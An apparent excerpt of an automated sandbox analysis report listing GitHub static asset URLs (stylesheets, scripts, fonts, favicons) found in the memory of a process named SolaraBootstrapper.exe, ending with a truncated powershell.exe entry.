                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/element-registry-ee3b4c180fee.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/environment-4a62f2832289.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/error-add24e2c1056.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-cf4e90581e80.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-elements-221b0e7d77a3.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/global-fe6db6dfddd1.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-15a4cf222dbb.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light-efd2f2257c96.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_colorblind-afcc3a6a38dd.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-79bca7145393.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/notifications-global-3ddac678adaf.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-9f7b2e63c497.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-primitives-8500c2c7ce5f.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/sessions-f096195f32d8.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/site-428f46b93a39.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_upd
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d1
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_gith
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_anchored-posit
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-b0
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-no
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/wp-runtime-9a56ebf061bf.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
                  Source: powershell.exe, 00000001.00000002.1718116672.0000000008B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mic
